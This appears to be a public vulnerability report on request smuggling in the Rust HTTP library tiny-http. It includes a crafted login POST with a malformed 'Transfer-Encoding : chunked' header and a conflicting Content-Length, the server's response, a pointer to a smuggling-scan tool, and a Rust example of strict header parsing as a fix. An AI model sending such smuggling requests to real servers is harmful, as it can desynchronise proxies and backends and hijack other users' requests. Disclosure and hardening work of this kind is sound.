Posting it here for community patches after talking with the maintainers privately.
Issue: tiny-http doesn't prevent Request Smuggling attacks (CE:TL,TL:TL) where a frontend proxy might allow/pass malformed Transfer-Encoding headers but tiny-http will normalise them.
POST /login HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://dvws.local
Connection: close
Referer: http://test.local/
Upgrade-Insecure-Requests: 1
DNT: 1
Transfer-Encoding : chunked
19
login=admin&password=xxxx
1
Z
Q
In the above example, the request is sent with the Transfer-Encoding header having extra spaces (Transfer-Encoding : chunked). This is in violation of RFC 7230. tiny-http is normalizing the Transfer-Encoding : chunked header, hence we get the below response.
HTTP/1.1 400 Bad Request
Server: tiny-http (Rust)
Date: Tue, 16 Jun 2020 11:13:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
{"description":"could not read the body from the request, or could not execute the CGI program","cause":{"description":"Error while decoding chunks","cause":null}}
More variations of this exist:
You can also use https://github.com/defparam/smuggler to fully check what header variations are allowed.
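An added example, not tiny-http's own code, of the strict parsing RFC 7230 section 3.2.4 asks for: a header line with whitespace between the field-name and the colon is rejected (the RFC says with a 400) rather than normalised, and a request carrying both Content-Length and Transfer-Encoding, which section 3.3.3 says ought to be treated as an error, is refused instead of being left for a proxy and a backend to frame differently. The names HeaderError, parse_header_line and parse_headers are chosen here, and the sample header block is constructed from the request in this issue.

```rust
// Added example (not tiny-http's code): strict header-field parsing.
// RFC 7230 s3.2.4 forbids whitespace between a field-name and the colon;
// a parser that trims "Transfer-Encoding " down to "Transfer-Encoding"
// lets a frontend that ignores the malformed line and a backend that
// honours it disagree about where the request body ends.

#[derive(Debug, PartialEq)]
pub enum HeaderError {
    MissingColon,
    WhitespaceBeforeColon,
    InvalidFieldName,
    ConflictingFraming,
}

/// Parse one header line. A space or tab before the colon is an error,
/// not something to normalise away; the field-name must be an RFC token.
pub fn parse_header_line(line: &str) -> Result<(String, String), HeaderError> {
    let colon = line.find(':').ok_or(HeaderError::MissingColon)?;
    let (name, rest) = line.split_at(colon);
    if name.ends_with(' ') || name.ends_with('\t') {
        return Err(HeaderError::WhitespaceBeforeColon);
    }
    let is_tchar = |c: char| c.is_ascii_alphanumeric() || "!#$%&'*+-.^_`|~".contains(c);
    if name.is_empty() || !name.chars().all(is_tchar) {
        return Err(HeaderError::InvalidFieldName);
    }
    // Optional whitespace around the field-value is permitted by the RFC.
    Ok((name.to_ascii_lowercase(), rest[1..].trim().to_string()))
}

/// Parse a whole header block and refuse the ambiguous CL+TE combination
/// (RFC 7230 s3.3.3) instead of silently picking one framing.
pub fn parse_headers(block: &str) -> Result<Vec<(String, String)>, HeaderError> {
    let mut out = Vec::new();
    for line in block.lines().filter(|l| !l.is_empty()) {
        out.push(parse_header_line(line)?);
    }
    let has_cl = out.iter().any(|(n, _)| n == "content-length");
    let has_te = out.iter().any(|(n, _)| n == "transfer-encoding");
    if has_cl && has_te {
        return Err(HeaderError::ConflictingFraming);
    }
    Ok(out)
}

fn main() {
    // Constructed sample modelled on the request in this issue.
    let head = "Host: test.local\r\nContent-Length: 42\r\nTransfer-Encoding : chunked\r\n";
    println!("{:?}", parse_headers(head)); // Err(WhitespaceBeforeColon)
}
```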